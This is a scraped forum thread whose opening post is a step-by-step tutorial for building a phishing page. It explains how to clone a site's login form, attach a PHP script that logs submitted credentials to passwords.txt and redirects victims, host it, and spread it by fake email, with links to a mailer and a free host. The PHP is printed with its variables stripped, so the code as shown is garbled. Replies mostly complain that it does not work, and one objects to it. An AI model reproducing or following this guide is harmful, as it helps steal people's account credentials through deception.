[How To]Phishing Tutorial menu

User Tag List

Page 1 of 2 12 LastLast
Results 1 to 15 of 16
  1. #1
    cab0ose's Avatar Active Member
    Reputation
    18
    Join Date
    Aug 2006
    Posts
    56
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    [How To]Phishing Tutorial

    -
    Disclaimer::

    This tutorial is for educational purposes, whatever anyone does with it is of no concern of mine.
    The "passwords.txt" Link is only for show to show what it will look like =]

    -

    ::Get the pages Source Code::
    First you should goto the site you want to phish, and goto a login page, make sure you are logged out to get onto the logon page. Press "View > Source", Copy and Paste what you get into a blank NotePad File, Save it as "Login.htm"

    ::Making the Phish File::
    Open a new NotePad File and Paste the following Code into it
    Code:
    <?php
    header ('Location: http://myspace.com ');
     = fopen("passwords.txt", "a");
    foreach(Array as  => ) {
    fwrite(, );
    fwrite(, "=");
    fwrite(, );
    fwrite(, "rn");
    }
    fwrite(, "rn");
    fclose();
    exit;
    ?>
    Change the "http://myspace.com" to the site you are phishing.

    Save the file as "phish.php"

    Go back to your login.htm file and click edit. Press CTRL+F and type in action= in the box. Keep pressing find until you find something that says action=(something that has to do with logging in). Replace that with phish.php. You have a phisher =].

    ::How to access the passwords::

    To access the details of your victims you need to enter the domain that the hosting service give you and put "passwords.txt" at the end of it.

    For Example. I would type in: http://freegametime.byethost4.com/passwords.txt

    ::Helpful Links::

    mmoMailer.com - Ready, Set, Scam! - This allows you to send fake emails from fake email addresses and send your phishing site out.

    http://bytehost.com/ - This is a pretty good hosting site without ads and they offer you a free .co.cc domain name when you are signing up for free hosting =].

    Any Questions just ask =]
    Last edited by cab0ose; 08-03-2008 at 09:34 PM.
    iXeo-Studios ::New Tech/Server Dev/Scripting Forum::
    ixeo-studios.co.cc - Join Now!

    [How To]Phishing Tutorial
  2. #2
    killerhampsters's Avatar Member
    Reputation
    1
    Join Date
    Nov 2007
    Posts
    3
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I believe there is a problem with the PHP code. When ever it runs, I first get an error with the first '=' on line 3.

    I'm curious if it's the code, or a problem with how I did things.

  3. #3
    Ultrapowa's Avatar Active Member
    Reputation
    16
    Join Date
    May 2008
    Posts
    87
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Actually all the variables have been erased from the php code lol ^^

  4. #4
    killerhampsters's Avatar Member
    Reputation
    1
    Join Date
    Nov 2007
    Posts
    3
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Lol. well then that makes a lot of sense now.
    I should have noticed there were no variables, but I have limited knowledge with php.

  5. #5
    Trauts's Avatar Active Member
    Reputation
    52
    Join Date
    May 2007
    Posts
    185
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Great guide, but I'm unclear as to how you are supposed get the images for the site. Do you just do the "Save Page As..." option in Firefox or is it something else completely? Otherwise, good job.

  6. #6
    killerhampsters's Avatar Member
    Reputation
    1
    Join Date
    Nov 2007
    Posts
    3
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Does anyone have the php code variables?
    A fixed code is needed to make a complete guide, or at least an explanation on why there are no variables.

  7. #7
    Synistar's Avatar Member
    Reputation
    2
    Join Date
    Jun 2008
    Posts
    11
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    On byethost I cant figure out how to make a new website.. etc. Freehabbocredtis.co.cc
    any help?

  8. #8
    Aelus's Avatar Active Member
    Reputation
    72
    Join Date
    Jan 2007
    Posts
    687
    Thanks G/R
    0/2
    Trade Feedback
    1 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    If I could i'd -rep you Cab0se, for the fact you put up a NON working guide, and don't even come back to fix it... a shame. Looks like someone was trying to grab some quick rep.



  9. #9
    Shanc's Avatar Member
    Reputation
    15
    Join Date
    Mar 2008
    Posts
    77
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Aelus View Post
    If I could i'd -rep you Cab0se, for the fact you put up a NON working guide, and don't even come back to fix it... a shame. Looks like someone was trying to grab some quick rep.
    Amen
    (filler)
    PM me for custom sig

  10. #10
    funky1's Avatar Private
    Reputation
    1
    Join Date
    Dec 2010
    Posts
    1
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    cab0ose we need to chat for just some few minutes.. how about that ?

  11. #11
    johnyx's Avatar Master Sergeant
    Reputation
    4
    Join Date
    Dec 2010
    Posts
    75
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    to me only the "header ('Location: Myspace | Social Entertainment ');" line makes sense , other than that it's just JUNK I mean junk
    even I don't mean the variables are missing, the logic behind this is useless

  12. #12
    Modcory's Avatar Corporal
    Reputation
    6
    Join Date
    Feb 2010
    Posts
    28
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Is phishing discussion allowed here?

  13. #13
    Aegeus's Avatar Contributor Walter White CoreCoins Purchaser
    Reputation
    134
    Join Date
    Feb 2012
    Posts
    245
    Thanks G/R
    0/0
    Trade Feedback
    2 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I'm pretty sure this is the 'Scam Prevention' forum, not 'Heres how you steal other peoples shit'

  14. #14
    gippy's Avatar Elite User
    Reputation
    436
    Join Date
    Jun 2008
    Posts
    1,323
    Thanks G/R
    293/139
    Trade Feedback
    7 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Modcory View Post
    Is phishing discussion allowed here?
    It was at one time, not anymore, hence the 5 year old thread

  15. #15
    MiroPichaa's Avatar Member
    Reputation
    1
    Join Date
    Jun 2020
    Posts
    1
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Can i have some help plz? my discord is: W A F F L E S#5705

Page 1 of 2 12 LastLast

Similar Threads

  1. Website phishing... how (un)safe?
    By Matador in forum World of Warcraft General
    Replies: 0
    Last Post: 09-05-2007, 08:02 AM
  2. Tutorial on how to remove Joanas 1-70 protection / trackers
    By Tcl70 in forum World of Warcraft Guides
    Replies: 11
    Last Post: 08-09-2007, 11:19 PM
  3. How to phish without have a credible domain name
    By patatovor in forum WoW Scam Prevention
    Replies: 27
    Last Post: 07-16-2007, 12:58 PM
  4. Tutorial: How to be Sarcastic
    By Alkhara Majere in forum Community Chat
    Replies: 14
    Last Post: 05-21-2007, 03:40 PM
All times are GMT -5. The time now is 10:06 PM. Powered by vBulletin® Version 4.2.3
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2024 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search